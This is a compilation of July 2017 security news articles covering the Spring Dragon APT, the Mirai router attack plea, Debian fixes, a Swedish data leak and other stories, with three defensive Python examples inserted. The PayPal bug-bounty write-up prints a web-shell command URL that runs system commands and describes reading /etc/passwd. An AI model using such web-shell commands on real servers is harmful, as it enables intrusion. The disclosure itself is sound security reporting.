The problem for private industry, however, is the fundamental difference between kinetic and cyber warfare. "The idea that a major power would threaten the critical infrastructure of another major power over an information operation would be outrageous if the threat was carried out via kinetic means."

But governments are reluctant to respond in the cyber domain as they would in the kinetic domain for fear of escalation ultimately leading to the transition from cyber to real world conflict. The result is that cyber collateral damage is largely accepted by governments; and that collateral damage is frequently private industry.

"With no ability, or even intent to dissuade destructive attacks from nation states," warns Cybereason, "the private sector is paying the ultimate price. They are most often the victims of these attacks because they are both less secure than government networks and also have been largely deemed a 'safe' target from a retaliation standpoint."

For this reason, Cybereason believes "that the cluster of relatively low sophisticated [nation-state] attacks is likely to continue to grow year over year. The victims will likely continue to be non-government institutions that for some reason or other present a useful target for advancing a hostile nation's interests."

It is equally worried, however, that similar tactics will be adopted by non-state attackers.

"Currently, DDoS is the easiest and most leveraged tool for hacktivists and those looking to disrupt specific entities," the security firm says. "However, as more destructive tools continue to be used and society continues to become numb to the announcements of new attacks, cybercrime and hacktivists will increasingly be willing to move into this space. The ability to have a larger impact combined with the ability to increase obfuscation by not only damaging the information systems but also wiping forensic evidence will become even more enticing for those who want to expand their business model."

Put simply, Cybereason believes that private sector attackers will increasingly use destruction as part of their methodology. The implication, and advice from Cybereason, is that the private sector defenders need to factor aggressive destruction into their risk management.

It warns against relying on 'deterrence by denial', whether this is a government-induced threat of retaliation or private sector 'hacking back'. Government will be reluctant to instigate the former, while the latter "is only going to lead to more hacking, less secure networks, and in general a shorter and more brutal life for corporation's network security."

It recommends two courses of action for the private sector. The first is to understand and recognize where it might be a target for "a nation state lashing out" now, and possibly destructive hacktivist attacks in the future. This implies that effective disaster recovery can no longer be considered a luxury but an absolute necessity. The second is to switch from reactive defense to proactive threat-hunting within the network, in order to detect and block destructive attacks before they can be triggered by the adversary.

In June 2017, Cybereason announced that it had raised $100 million in Series D funding, increasing the total investment in the firm to $189 million.


Over 600 Malware Samples Linked to Chinese Cyberspy Group

24.7.2017 securityweek Virus

A China-linked cyber espionage group tracked by security firms as Lotus Blossom, Elise, Esile and Spring Dragon has used more than 600 malware samples in its attacks over the past years, according to Kaspersky Lab.

Spring Dragon has been around since at least 2012, but there is some evidence suggesting that it may have been active since 2007. The state-sponsored threat group has mainly targeted military and government organizations in Southeast Asia.

Kaspersky Lab learned recently from a research partner in Taiwan of new attacks launched by the group. Data collected by the security firm indicates that the APT actor has also targeted political parties, universities and other educational institutions, and companies in the telecommunications sector.

The cyberspies appear to focus on countries around the South China Sea, including Taiwan, Indonesia, Vietnam, the Philippines, Hong Kong, Malaysia and Thailand.

The threat actor has been using a wide range of tools, including backdoors that can download other files to the compromised machine, upload files to a remote server, and execute files and commands. Kaspersky Lab has identified a total of more than 600 malware samples used over the past years.

According to the security firm, the malware leverages a command and control (C&C) infrastructure of more than 200 unique IP addresses and domains, with each sample using hardcoded campaign codes and custom C&C addresses.

The C&C servers used by Spring Dragon are located in several countries, but roughly two-thirds are located in Hong Kong and the United States. Some servers have also been spotted in Germany, China and Japan.

Based on malware compilation timestamps, which Kaspersky believes have not been altered, the attackers appear to be located in the GMT+8 timezone, which corresponds to China, Indonesia, Malaysia, Mongolia, Singapore, Taiwan, the Philippines and Western Australia.

The malware compilation timestamps also suggest that the members of the group either work in two shifts, or Spring Dragon malware has been compiled by two different groups, one of which may be located in Europe.

“The number of malware samples which we managed to collect (over 600) for the group surpassed many others, and suggests an operation on a massive scale. It’s possible that this malware toolkit is offered in specialist public or private forums to any buyers, although, to date, we haven’t seen this,” explained Kaspersky’s Noushin Shabab.


Internet Bug Bounty Project Receives $300,000 Donation

24.7.2017 securityweek Security

The Internet Bug Bounty (IBB), a project whose goal is to make the Web safer by rewarding white hat hackers who find vulnerabilities in core Internet infrastructure and open source software, announced on Friday that it has secured a $300,000 donation.

Facebook, GitHub and the Ford Foundation, one of the world’s largest charitable organizations, have each donated $100,000 to the IBB. With their donation, GitHub and the Ford Foundation have joined existing sponsors, Facebook, Microsoft and HackerOne.

The IBB rewards researchers who find vulnerabilities in OpenSSL, Nginx, Apache httpd, Perl, PHP, Python, Ruby, Flash, Ruby on Rails, Phabricator, Django, RubyGems and other widely used Internet technologies.

Since its launch in November 2013, the IBB has awarded more than $600,000 for over 600 vulnerabilities found by bounty hunters. This includes over $150,000 awarded last year and $45,000 that hackers decided to donate to charities and nonprofit organizations, such as the Electronic Frontier Foundation (EFF), Hackers for Charity, and the Freedom of the Press Foundation.

Critical security holes such as ImageTragick, Heartbleed and Shellshock earned researchers $7,500, $15,000 and $20,000, respectively.

With the newly raised funds, the IBB plans on expanding the scope of the bug bounty program by adding a new category for flaws in popular data parsing libraries, which are considered increasingly risky. The expansion will also cover technologies that “serve as the technical foundation of a free and open Internet, such as OpenSSL.”

“At Ford Foundation we believe that a secure, free and open internet is critical in the fight against inequality,” said Michael Brennan, Ford Foundation’s technology program officer on the Internet Freedom team. “The open source infrastructure of the internet is part of a public commons that we are committed to help maintain and draw attention to. A necessary part of this maintenance is recognizing and rewarding those who uncover critical vulnerabilities in freely available code that we all rely upon.”


Briton Pleads Guilty to Mirai Attacks in German Court

24.7.2017 securityweek BotNet

A British man pleaded guilty last week in a German court to launching a cyberattack that resulted in more than one million customers of telecommunications provider Deutsche Telekom experiencing Internet disruptions.

German media has identified the 29-year-old man as “Peter Parker” and “Spiderman,” online monikers linked to domains used to coordinate some attacks powered by the notorious Mirai malware. He was also identified by Handelsblatt as Daniel K.

A blog post published earlier this month by security blogger Brian Krebs revealed that the suspect is a British man named Daniel Kaye and the hacker known online as “BestBuy.” He has also been tied to the nickname “Popopret,” but it’s unclear if it’s the same person or a partner of BestBuy.

Krebs found links between Kaye, a massive Mirai botnet that enslaved a large number of Internet of Things (IoT) devices, and a piece of malware named GovRAT.

Reports of BestBuy’s apprehension surfaced in February when German police announced that a man suspected of carrying out the November 2016 attack on Deutsche Telekom had been arrested by the U.K. National Crime Agency (NCA) at a London airport based on a warrant issued by authorities in Germany.

According to German media reports, the 29-year-old pleaded guilty on Friday in the Regional Court of Cologne, claiming that he regretted his actions. He said his main motive was money – he was about to marry his fiancée and he wanted a good start to married life. It’s worth mentioning that the social media profiles for Daniel Kaye uncovered by Krebs also showed that he had been engaged to be married.

The hacker told the court that Deutsche Telekom was not the main target of his attack. Instead, he used the Mirai malware to hijack routers – including ones belonging to Deutsche Telekom customers – and other types of devices, which he abused to launch distributed denial-of-service (DDoS) attacks. He claimed a telecommunications firm in the West African country of Liberia paid him $10,000 to attack a competitor.

At the time of his arrest, German authorities said the suspect faced between 6 months and 10 years in prison. He may be sentenced on July 28.


New Debian 9.1 release includes 26 security fixes for 55 packages
24.7.2017 securityaffairs Vulnerability

The Debian Project announced the Debian 9.1 GNU/Linux, a version that brings numerous updates and addresses many security issues.
The Debian Project announced the new Debian 9.1 release that includes 26 security fixes. The list of fixed problems includes the Heimdal Kerberos man-in-the-middle vulnerability, a 20-year-old vulnerability in Kerberos that was patched this week for both Microsoft and Linux distros.

“The Debian project is pleased to announce the first update of its stable distribution Debian 9 (codename stretch). This point release mainly adds corrections for security issues, along with a few adjustments for serious problems. Security advisories have already been published separately and are referenced where available.” states the announcement.

“Please note that the point release does not constitute a new version of Debian 9 but only updates some of the packages included. There is no need to throw away old stretch media. After installation, packages can be upgraded to the current versions using an up-to-date Debian mirror.”

Debian 9.1 isn’t a new Debian version and doesn’t bring new features; it only updates the existing packages, with a special focus on security.

Debian 9.1 also addresses security issues in Apache, and includes a number of Linux kernel updates and patches for OpenVPN flaws (including the recently fixed CVE-2017-7508 and CVE-2017-7520).

The new release fixes CVE-2017-1000381 in the c-ares function “ares_parse_naptr_reply()”; it also addresses several issues in the dwarfutils link shortener and in libquicktime.

“The c-ares function `ares_parse_naptr_reply()`, which is used for parsing NAPTR responses, could be triggered to read memory outside of the given input buffer if the passed in DNS response packet was crafted in a particular way.” states the description for the CVE-2017-1000381 flaw.
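The class of bug described above is a missing bounds check while parsing a length-prefixed wire format. The following is an added example, not c-ares code and not a reproduction of its internals: a NAPTR RDATA parser that validates every length taken from the packet against the bytes that remain, with a constructed well-formed record and two constructed malformed ones.

```python
"""Bounds-checked parser for the RDATA of a DNS NAPTR record (RFC 3403).

Added example for the c-ares issue (CVE-2017-1000381) discussed above; it is not
c-ares code. It shows the property a safe parser needs: every length read from
the packet is checked against the bytes that remain before it is used.
The sample records below are constructed.
"""
import struct


def _take(buf, pos, n):
    """Return (buf[pos:pos+n], new_pos) only if those n bytes actually exist."""
    if n < 0 or pos + n > len(buf):
        raise ValueError(f"truncated NAPTR RDATA: need {n} bytes at offset {pos}, "
                         f"have {len(buf) - pos}")
    return buf[pos:pos + n], pos + n


def _char_string(buf, pos):
    """<character-string>: one length octet followed by that many bytes."""
    length, pos = _take(buf, pos, 1)
    return _take(buf, pos, length[0])   # the length octet is validated, not trusted


def _domain_name(buf, pos):
    """Uncompressed <domain-name>: length-prefixed labels ending with a 0 octet.
    RFC 3403 forbids compression pointers in the replacement field, so reject them."""
    labels = []
    while True:
        length, pos = _take(buf, pos, 1)
        n = length[0]
        if n == 0:
            break
        if n >= 0xC0:
            raise ValueError("compression pointer not allowed in NAPTR replacement")
        if n > 63:
            raise ValueError(f"label length {n} exceeds 63")
        label, pos = _take(buf, pos, n)
        labels.append(label.decode("ascii"))
    return (".".join(labels) or "."), pos


def parse_naptr_rdata(buf):
    """Parse NAPTR RDATA into a dict, raising ValueError on any malformed input."""
    header, pos = _take(buf, 0, 4)
    order, preference = struct.unpack(">HH", header)
    flags, pos = _char_string(buf, pos)
    services, pos = _char_string(buf, pos)
    regexp, pos = _char_string(buf, pos)
    replacement, pos = _domain_name(buf, pos)
    if pos != len(buf):
        raise ValueError(f"{len(buf) - pos} trailing bytes after NAPTR RDATA")
    return {
        "order": order,
        "preference": preference,
        "flags": flags.decode("ascii"),
        "services": services.decode("ascii"),
        "regexp": regexp.decode("ascii"),
        "replacement": replacement,
    }


def is_valid_naptr(buf):
    """True if buf parses cleanly, False if the parser rejected it."""
    try:
        parse_naptr_rdata(buf)
        return True
    except ValueError:          # UnicodeDecodeError is a ValueError subclass
        return False


# Constructed well-formed RDATA: order 100, preference 10, flags "u",
# services "E2U+sip", a SIP rewrite regexp, and the root name "." as replacement.
SAMPLE_NAPTR = (
    struct.pack(">HH", 100, 10)
    + b"\x01u"
    + b"\x07E2U+sip"
    + b"\x1b!^.*$!sip:info@example.com!"
    + b"\x00"
)

# Constructed malformed inputs: the first cuts the packet mid-field, the second
# advertises a 255-byte flags string with no bytes behind it. A parser that trusts
# the length octet would read past the end of its buffer on both.
TRUNCATED_NAPTR = SAMPLE_NAPTR[:10]
OVERSIZED_LENGTH_NAPTR = struct.pack(">HH", 100, 10) + b"\xff"

if __name__ == "__main__":
    print(parse_naptr_rdata(SAMPLE_NAPTR))
    print(is_valid_naptr(TRUNCATED_NAPTR), is_valid_naptr(OVERSIZED_LENGTH_NAPTR))
```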

Debian 9.1

To update all packages, run the following command:

apt-get update && apt-get upgrade
To download Debian 9.1 images, refer to one of the mirrors listed at the following URL:

https://www.debian.org/mirror/list


Spring Dragon – Updated Activity
24.7.2017 Kaspersky 
APT

Spring Dragon is a long running APT actor that operates on a massive scale. The group has been running campaigns, mostly in countries and territories around the South China Sea, since as early as 2012. The main targets of Spring Dragon attacks are high profile governmental organizations and political parties, education institutions such as universities, as well as companies from the telecommunications sector.

In the beginning of 2017, Kaspersky Lab became aware of new activities by an APT actor we have been tracking for several years called Spring Dragon (also known as LotusBlossom).

Information about the new attacks arrived from a research partner in Taiwan and we decided to review the actor’s tools, techniques and activities.

Using Kaspersky Lab telemetry data we detected the malware in attacks against some high-profile organizations around the South China Sea.

Spring Dragon is known for spear phishing and watering hole techniques and some of its tools have previously been analyzed and reported on by security researchers, including Kaspersky Lab. We collected a large set (600+) of malware samples used in different attacks, with customized C2 addresses and campaign codes hardcoded in the malware samples.

Spring Dragon’s Toolset

The threat actor behind Spring Dragon APT has been developing and updating its range of tools throughout the years it has been operational. Its toolset consists of various backdoor modules with unique characteristics and functionalities.

The threat actor owns a large C2 infrastructure which comprises more than 200 unique IP addresses and C2 domains.

The large number of samples which we have managed to collect have customized configuration data, different sets of C2 addresses with new hardcoded campaign IDs, as well as customized configuration data for creating a service for malware on a victim’s system. This is designed to make detection more difficult.

All the backdoor modules in the APT’s toolset are capable of downloading more files onto the victim’s machine, uploading files to the attacker’s servers, and also executing any executable file or any command on the victim’s machine. These functionalities enable the attackers to undertake different malicious activities on the victim’s machine.

A detailed analysis of known malicious tools used by this threat actor is available for customers of Kaspersky Threat Intelligence Services.

Command and Control (C2) Infrastructure

The main modules in Spring Dragon attacks are backdoor files containing IP addresses and domain names of C2 servers. We collected and analyzed information from hundreds of C2 IP addresses and domain names used in different samples of Spring Dragon tools that have been compiled over the years.

In order to hide their real location, attackers have registered domain names and used IP addresses from different geographical locations. The chart below shows the distribution of servers based on geographical location which the attackers used as their C2 servers.

Distribution chart of C2 servers by country

More than 40% of all the C2 servers used for Spring Dragon’s operations are located in Hong Kong, which hints at the geographical region (Asia) of the attackers and/or their targets. The next most popular countries are the US, Germany, China and Japan.

Targets of the Attacks

As was mentioned, the Spring Dragon threat actor has been mainly targeting countries and territories around the South China Sea with a particular focus on Taiwan, Indonesia, Vietnam, the Philippines, Hong Kong, Malaysia and Thailand.

Our research shows that the main targets of the attacks are in the following sectors and industries:

High-profile governmental organizations
Political parties
Education institutions, including universities
Companies from the telecommunications sector
The following map shows the geographic distribution of attacks according to our telemetry, with the frequency of the attacks increasing from yellow to red.

Geographic map of attacks

Origin of the Attacks

The victims of this threat actor have always been mainly governmental organizations and political parties. These are known to be of most interest to state-supported groups.

The type of malicious tools the actor has implemented over time are mostly backdoor files capable of stealing files from victims’ systems, downloading and executing additional malware components as well as running system commands on victims’ machines. This suggests an intention to search and manually collect information (cyberespionage). This activity is most commonly associated with the interests of state-sponsored attackers.

As a routine analysis procedure, we decided to figure out the attacker’s possible time zone using the malware compilation timestamps from a large number of Spring Dragon samples. The following diagram shows the frequency of the timestamps during daytime hours. The timestamps range from early 2012 until now and are aligned to the GMT time zone.

Assuming the peak working hours of malware developers are the standard working day of 09:00-17:00, the chart shows that compilation took place in the GMT+8 time zone. It also suggests that either there is a second group working another shift in the same time zone or the attackers are cross-continental and there is another group, possibly in Europe. The uneven distribution of timestamps (low activity around 10am, 7-8pm UTC) suggests that the attackers didn’t change the timestamps to random or constant values and they might be real.

Histogram of malware files’ timestamps
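The time-zone inference described above can be reproduced on any set of compile timestamps. What follows is an added example, not Kaspersky's code: it shifts UTC timestamps through candidate offsets, picks the one that places the most builds inside an assumed 09:00-17:00 working day, and applies the write-up's sanity check that genuine timestamps cluster unevenly rather than being constant or flat. The timestamps are constructed sample values, not real Spring Dragon samples.

```python
"""Infer the likely working time zone of a malware author from compile timestamps.

Added example for the timestamp analysis described above; it is not Kaspersky's code.
The timestamps are constructed sample values. In practice they come from the
TimeDateStamp field of each PE file's COFF header (seconds since 1970-01-01 UTC).
"""
from collections import Counter
from datetime import datetime, timedelta, timezone

WORK_START, WORK_END = 9, 17   # assumed standard working day, local time


def _utc_epoch(hour, day=10):
    """Constructed sample: a compile time on 2014-03-<day> at the given UTC hour."""
    return int(datetime(2014, 3, day, hour, 0, tzinfo=timezone.utc).timestamp())


# Constructed sample set: 11 builds between 01:00 and 08:00 UTC plus 2 late builds
# at 13:00 UTC, i.e. what a GMT+8 team working 09:00-17:00 would leave behind.
SAMPLE_TIMESTAMPS = [_utc_epoch(h) for h in (1, 2, 2, 3, 3, 5, 6, 6, 7, 8, 8)] + [
    _utc_epoch(13, day=11), _utc_epoch(13, day=12)]


def hour_histogram(timestamps_utc, offset_hours):
    """Count compile events per local hour after shifting UTC by offset_hours."""
    hist = Counter()
    for ts in timestamps_utc:
        local = datetime.fromtimestamp(ts, tz=timezone.utc) + timedelta(hours=offset_hours)
        hist[local.hour] += 1
    return hist


def work_hours_fraction(hist):
    """Share of compilations that fall inside the assumed working day."""
    total = sum(hist.values())
    if total == 0:
        return 0.0
    inside = sum(n for hour, n in hist.items() if WORK_START <= hour < WORK_END)
    return inside / total


def best_offset(timestamps_utc, offsets=range(-12, 15)):
    """Return the UTC offset (hours) that places the most builds in 09:00-17:00.
    Ties are broken towards the smaller absolute offset."""
    return max(offsets, key=lambda off: (
        work_hours_fraction(hour_histogram(timestamps_utc, off)), -abs(off)))


def looks_unaltered(hist):
    """Heuristic from the write-up: genuine timestamps cluster unevenly over the day.
    A single constant hour (wiped stamps) or a flat spread (randomised stamps) fails."""
    if len(hist) < 2:
        return False
    mean_per_hour = sum(hist.values()) / 24
    return max(hist.values()) >= 2 * mean_per_hour


if __name__ == "__main__":
    off = best_offset(SAMPLE_TIMESTAMPS)
    hist = hour_histogram(SAMPLE_TIMESTAMPS, off)
    print(f"best fit: GMT{off:+d}, {work_hours_fraction(hist):.0%} of builds in working hours, "
          f"timestamps look {'genuine' if looks_unaltered(hist) else 'tampered'}")
    for hour in range(24):
        print(f"{hour:02d}:00 {'#' * hist.get(hour, 0)}")
```

A second cluster in the shifted histogram, as the write-up observed, is what would point to a second shift or a second team in another time zone; this example only scores the single best-fitting offset.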

Conclusions

Spring Dragon is one of many long-running APT campaigns by unknown Chinese-speaking actors. The number of malware samples which we managed to collect (over 600) for the group surpassed many others, and suggests an operation on a massive scale. It’s possible that this malware toolkit is offered in specialist public or private forums to any buyers, although, to date, we haven’t seen this.

We believe that Spring Dragon is going to continue resurfacing regularly in the Asian region and it is therefore worthwhile having good detection mechanisms (such as Yara rules and network IDS signatures) in place. We will continue to track this group going forward and, should the actor resurface, we will provide updates on its new modus operandi.


EU digital chief Andrus Ansip announced his plans to improve cyber security in the EU
24.7.2017 securityaffairs Cyber

EU digital chief Andrus Ansip announced new measures to improve EU cyber security, including new offices to certify cybersecurity of technology products.
The EU digital chief Andrus Ansip announced his plan to set up a new office to certify the level of cyber security implemented in technology products.

The European Commission vice-president is thinking of a network of cybersecurity offices, so-called centers of excellence, spread across the states of the Union that will be focused on certifying the cyber security measures implemented by products.

“European products and cybersecurity products are not able, only some of them are able, to compete in the world market. We have to pay much more attention to this,” Ansip explained.

Andrus Ansip ✔ @Ansip_EU
International cooperation, large-scale exercises, R&D all essential to strengthen #cybersecurity @ccdcoe. More centres of excellence needed.
12:34 PM - 13 Jul 2017 · Tallinn, Estonia
In September, Ansip will present new measures on cybersecurity certification, including a system to grade products based on their security features.

“The European Commission is getting ready to propose new legislation to protect machines from cybersecurity breaches, signaling the executive’s growing interest in encouraging traditional European manufacturers to build more devices that are connected to the internet.” reported website www.euractiv.com.
Ansip also added that in September there will be an updated EU cyber security strategy in order to improve the ability of European organizations to respond to attacks.

EU digital chief Andrus Ansip

Ansip described the EU as a landscape where most countries lack the resources to repel cyber attacks; for this reason, it is necessary to improve cooperation and information sharing.

“Just in five EU member states we have 24/7 capabilities when we are talking about national CERTs,” Ansip said.


Hacker BestBuy pleads guilty to hijacking more than 900k Deutsche Telekom routers
24.7.2017 securityaffairs Hacking

The hacker BestBuy pleaded guilty in court on Friday to hijacking more than 900,000 routers from the network of Deutsche Telekom
The notorious hacker BestBuy, also known as Popopret, pleaded guilty in court on Friday to hijacking more than 900,000 routers from the network of Deutsche Telekom. The 29-year-old man, whose name wasn’t revealed by authorities, used a custom version of the Mirai IoT malware.


Earlier in July, the popular investigator Brian Krebs announced that he had discovered BestBuy’s real identity; according to the expert, the hacker is the Briton Daniel Kaye.

BestBuy was also known as the author of the GovRAT malware, he offered the source code of the RAT, including a code-signing digital certificate, for nearly 4.5 Bitcoin on the TheRealDeal black market.

German authorities referenced the man as Spiderman which is the name he used to register the domain names that the hacker used as C&C for his botnet.

According to the German website FutureZone.de, Deutsche Telekom estimated that the losses caused by the cyber attack were more than two million euros.

BestBuy targeted the routers in late November 2016 with the intent of recruiting them into his botnet, which was offered as a DDoS-for-hire service, but the malicious code variant he used accidentally triggered a DoS condition in the infected devices.

“The hacker admitted in court that he never intended for the routers to cease functioning. He only wanted to silently control them so he can use them as pawns in a DDoS botnet. ” wrote Bleepingcomputer.com.

In early December 2016, the man used another flawed version of Mirai that caused the same widespread problem in the UK, where more than 100,000 routers went offline. The routers belonged to the ISPs Kcom and TalkTalk and to the UK Post Office.

BestBuy was arrested in late February 2017 by the UK police at the London airport, then he was extradited to Germany to face charges in a German court in Cologne.

On July 21, the hacker BestBuy pleaded guilty; according to German media, the man explained that he was hired by a Liberian ISP to carry out DDoS attacks on local competitors.

The hacker said the Liberian ISP paid him $10,000 to hit its competitors.

BestBuy’s sentencing hearing is scheduled for July 28; the man faces up to ten years in jail.


Worst known governmental leak ever affected the Swedish Transport Agency. Homeland security at risk
24.7.2017 securityaffairs BigBrothers

Worst known governmental leak ever affected the Swedish Transport Agency, data includes records of members of the military secret units.
Sweden might be the scenario for the worst known governmental leak ever, the Swedish Transport Agency moved all of its data to “the cloud,” but it transferred it to somebody else’s computer.

The huge trove of data includes top secret documents related to the fighter pilots, SEAL team operators, police suspects, people under witness relocation.

“The responsible director has been found guilty in criminal court of the whole affair, and sentenced to the harshest sentence ever seen in Swedish government: she was docked half a month’s paycheck.” wrote

Full data of top-secret governmental individuals, including photo, name, and home address, was leaked.

Director General Maria Ågren in Sweden was fined half a month’s salary in a very short trial.

Further investigation into the governmental data leak revealed that the Swedish Transport Agency moved all its data to “the cloud”, as managed by IBM, two years ago, and that the Director General of the Transport Agency, Maria Ågren, was abruptly removed from her position in January 2017.

On July 6 it was disclosed that the Director had been found guilty of exposing classified information in a criminal court of law.

“But on July 6th, she is known to be secretly investigated to have cleared confidential information. According to the Security Unit for Security Objectives, the data may damage the security of the country. She is ordered to pay 70,000 kronor in daily fines.” reported the website SvtNyHeater.se.

“Among other things, the entire Swedish database of driving license photos has been available to several Czech technologies, which have not been tested for security. This means that neither the SÄPO nor the Transport Agency had control over the persons who handled the information that could be said to damage the security of the country.“

Leaked data included information related to people in the witness protection program and similar programs. This information was wrongly included in the register distributed outside the Agency as part of a normal procedure. Another unacceptable mistake was discovered by the investigators: when a new version without the sensitive identities was distributed, the Agency did not instruct recipients to destroy the old copy.

“Last March, the entire register of vehicles was sent to marketers subscribing to it. This is normal in itself, as the vehicle register is public information, and therefore subject to Freedom-of-Information excerpts.” continues the Swedish website. “What was not normal were two things: first, that people in the witness protection program and similar programs were included in the register distributed outside the Agency, and second, when this fatal mistake was discovered, a new version without the sensitive identities was not distributed with instructions to destroy the old copy. Instead, the sensitive identities were pointed out and named in a second distribution with a request for all subscribers to remove these records themselves. This took place in open cleartext e-mail.”

Swedish Transport Agency
Sensitive data on Swedish vehicles was released to companies with no security clearance. Credit: Jonas Ekströmer/TT

The leaked information is precious data for a foreign government in an information warfare scenario; it includes records of fighter pilots in the Air Force, policemen, and members of the military’s most secret units.

The archive also includes all kinds of information about every government and military vehicle, including their “operator, which says a ton about the structure of military support units;”

PrivacyNewsOnline confirmed that the governmental data leak is still ongoing and that a fix can be expected “maybe this fall”.

“Much of the available analysis of the leak is still in the form of fully-redacted documents from the Security Police and similar agencies.” concluded the news agency.


Expert exploited an unrestricted File Upload flaw in a PayPal Server to remotely execute code
24.7.2017 securityaffairs
Exploit

The security researcher Vikas Anil Sharma exploited an unrestricted File Upload vulnerability in a PayPal Server to remotely execute code.
The security researcher Vikas Anil Sharma has found a remote code execution vulnerability in a PayPal server.

The expert was visiting the PayPal Bug Bounty page using the Burp software; below is the response obtained when opening the page http://paypal.com/bugbounty/.

PayPal server hack

The expert focused his analysis on the list of PayPal’s domains mentioned in the “Content-Security-Policy” response header, in particular “https://*.paypalcorp.com”.

In this first phase, the hacker was interested in finding as many valid subdomains as possible to use in the attack; tools like Subbrute, Knockpy and enumall are useful when performing this kind of analysis.

“These are the tools which I normally use, but being lazy on the weekend I made use of VirusTotal this time to enumerate the subdomains. You can get the list here:

https://www.virustotal.com/en/domain/paypalcorp.com/information/

Copied the subdomain list locally & ran “dig -f paypal +noall +answer” to check out where all the subdomains are actually pointing to in a neat way,” wrote the researcher.

The expert noticed that the domain “brandpermission.paypalcorp.com” pointed to “https://www.paypal-brandcentral.com/”, a site hosting an online support ticket system where PayPal vendors, suppliers and partners request PayPal brand permissions.

The website allows users to upload mock-ups of logos and any brand-related graphics. The expert decided to create a ticket by uploading a simple image and analyzing the destination folder of the picture.

“So, I first created a ticket by uploading a simple image file named “finished.jpg” which got stored as “finished_thumb.jpg” in the directory:

“/content/helpdesk/368/867/finished_thumb.jpg”. “finished_thumb.jpg” was the new file created in the directory “/867/”. I quickly checked whether the actual file which we uploaded existed in the directory or not; luckily (you’ll know why later in the post) “finished.jpg” also existed in the same directory. Cool stuff ;)” continues the bug hunter’s post.

Vikas discovered that the above link includes the ticket number; in this specific case the number of the ticket he created is “368,” while “867” is the id of the folder where all the files related to the ticket, including the mock-up files, are stored.

The researcher created a new ticket and discovered that ticket ids and file ids are generated sequentially. He then uploaded a file with a “.php” extension instead of an image and found that the application did not validate the file type, content, etc.

“As soon as I saw the 302 response, I ran towards opening the ticket & doing a simple right click copy link shit like I was able to do when uploading an image file. But here, in this case, if you upload a php file as mock up you can’t see the path of the php file uploaded; the only thing which is visible is the ticket number,” wrote the expert.

Unlike with image uploads, the expert noticed that it was not possible to discover the folder used to store the mock-up file.

The expert had uploaded a file named “success.php,” so by analogy with the image upload he assumed that the file had been stored as “success_thumb.php”.

At this point, he decided to brute force the folder id for files.

PayPal server hack

Once he had found the folder id for the files, the researcher tried to execute code:
https://www.paypal-brandcentral.com/content/_helpdesk/366/865/success.php?cmd=uname-a;whoami

“Some cat+/etc/passwd magic to make myself believe that I have actually found an RCE ;)” he wrote.

PayPal server 3

Below is the timeline for the vulnerability:

Jul 08, 2017 18:03 – Submitted
Jul 11, 2017 18:03 – Fixed
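A hardened version of the mock-up upload handling described above, as an added example that is neither PayPal's code nor the researcher's: the vulnerable path scheme is kept only as a reference function, and the helper names, storage location and size limit are assumptions.

```python
import os
import secrets
from dataclasses import dataclass
from pathlib import Path

# Allow-listed image types: extension -> magic-byte prefixes the file must start with.
ALLOWED_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 5 * 1024 * 1024  # assumed size policy: 5 MiB per mock-up


@dataclass(frozen=True)
class Decision:
    accepted: bool
    reason: str
    stored_name: str = ""


def vulnerable_store_path(original_name: str, ticket_id: int, folder_id: int) -> str:
    """The behaviour the post describes: serial ids and the client's filename kept
    verbatim, so an uploaded .php lands at a guessable path under the web root."""
    return f"/content/_helpdesk/{ticket_id}/{folder_id}/{original_name}"


def validate_upload(original_name: str, content: bytes) -> Decision:
    """Accept only files that are real images by both name and content."""
    base = os.path.basename(original_name.replace("\\", "/"))  # drop any path component
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        # Exactly one extension: rejects "success.php", "shell.php.jpg" and ".htaccess".
        return Decision(False, "name must be <basename>.<ext> with a single extension")
    ext = parts[1]
    if ext not in ALLOWED_TYPES:
        return Decision(False, f"extension .{ext} is not an allowed image type")
    if len(content) > MAX_BYTES:
        return Decision(False, "file exceeds size limit")
    if not any(content.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        # Extension claims an image but the bytes do not: e.g. script source renamed to .jpg.
        return Decision(False, "content does not match the declared image type")
    # Server-chosen random name: nothing from the client is reused, and neighbouring
    # tickets' files cannot be enumerated by counting up from a known id.
    return Decision(True, "ok", f"{secrets.token_hex(16)}.{ext}")


def store_upload(original_name: str, content: bytes, storage_root: Path) -> Decision:
    """Write an accepted upload under storage_root, a directory outside the document
    root; the application streams files back with an image Content-Type, so nothing
    uploaded is ever handed to the PHP interpreter."""
    decision = validate_upload(original_name, content)
    if decision.accepted:
        (storage_root / decision.stored_name).write_bytes(content)
    return decision
```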


The UK continues to grant the export of surveillance equipment to countries like Turkey
24.7.2017 securityaffairs BigBrothers

According to the UK’s Department for International Trade, the country granted a license to export surveillance equipment to Turkey earlier this year.
The UK continues to be one of the most active countries involved in the trade of surveillance technology. British firms continue to export surveillance systems ranging from internet mass surveillance equipment to-catchers.
Surveillance equipment

According to the UK’s Department for International Trade, the country granted a license to export surveillance equipment to Turkey earlier this year, exactly while the Turkish Government was conducting a severe repression against opponents, dissidents, journalists and human rights advocates.

Turkey today continues to be the country that arrests more journalists than any other state worldwide. Last week, a Turkish court ordered the arrest of Amnesty’s Turkey director along with other human rights activists.

While the UK government granted the above export license, the situation in Turkey became particularly worrying. In December, the Turkish authorities investigated more than 10,000 individuals over online terror activities. The suspects were accused of sharing material and posts against government officials.

The Turkish Government applied restrictions on the Tor anonymity network and, more generally, on all VPN services that could be used to circumvent censorship.

The Turkish authorities questioned more than 3,000 people from June to December 2016; 1,656 of them were arrested.

The Government dismissed 4,400 public servants, while Human Rights Watch claimed the Turkish government jailed members of the democratic opposition.

We cannot ignore that Turkey is under constant threat from terrorist organizations due to its geographic location.

A Department for International Trade spokesperson told Motherboard in an email, “The UK government takes its defence export responsibilities very seriously and operates one of the most robust export control regimes in the world.” The spokesperson said the UK examines each application on a case-by-case basis, and draws from NGO reports and other resources. “We have suspended or revoked licences when the level of risk changes and we constantly review local situations.”

I personally believe that it is absurd that the UK, or any other government, still provides surveillance equipment to states that don’t respect human rights.


THN Weekly Roundup — 10 Most Important Stories You Shouldn't Miss
23.7.2017 thehackernews Mobil
Here we are with our weekly roundup, briefing this week's top cyber security threats, incidents and challenges.
This week has been very short but full of big news, from the shutdown of two of the largest Dark Web marketplaces and the theft of millions of dollars in the popular Ethereum cryptocurrency to the discovery of new Linux malware leveraging the SambaCry exploit.
